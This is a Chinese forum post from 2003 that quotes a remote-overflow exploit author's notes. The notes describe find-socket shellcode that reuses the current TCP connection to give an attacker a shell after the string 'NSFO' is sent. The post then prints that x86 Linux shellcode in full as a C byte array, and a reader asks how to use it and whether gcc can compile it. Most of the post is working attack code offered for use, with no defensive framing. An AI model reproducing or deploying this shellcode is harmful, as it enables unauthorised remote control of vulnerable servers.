|
|
exploit,功能简单,c远程溢出s后remote_shellcode获得控制,找出当前tcp连接,直接绑
定远程shell,非fork()类型的。不喜欢fork()一堆去找这条tcp连接,当然,只是个人不喜欢。
搞定了sigaction,看来干什么都要找专业的,
,不能相信gcc编译的结果或者strace跟踪的结果。
unsigned char remote_shellcode[] =
"\xeb\x57\x5f\x31\xc0\x40\x89\x47"
"\x08\x31\xd2\x8d\x4f\x08\x31\xdb"
"\xb3\x0d\x04\x42\xcd\x80\x31\xc9"
"\xb5\x04\x89\xcb\x51\x31\xc9\xb1"
"\x03\x31\xd2\x31\xc0\xb0\x37\xcd"
"\x80\x89\xc6\x89\xc2\x80\xce\x08"
"\x41\x31\xc0\xb0\x37\xcd\x80\x89"
"\xca\x8d\x4f\x08\x89\xd0\x48\xcd"
"\x80\x89\xd1\x89\xf2\x31\xc0\xb0"
"\x37\xcd\x80\x59\x81\x7f\x08\x4e"
"\x53\x46\x4f\x74\x06\xe2\xc3\xeb"
"\xbd\xeb\x33\x31\xc9\x31\xc0\xb0"
"\x3f\xcd\x80\x41\x31\xc0\xb0\x3f"
"\xcd\x80\x41\x31\xc0\xb0\x3f\xcd"
"\x80\x89\xfb\x89\x5f\x08\x31\xc0"
"\x89\x47\x0c\x88\x47\x07\x31\xd2"
"\x8d\x4f\x08\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\x6f"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68;
c输入标识字符串"NSFO",获取远程shell
我看完这看不懂,,请问得到这代码如何使用啊~???可以用gcc吗? |
|
IP卡
狗仔卡
发表于 2003-4-22 10:36:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡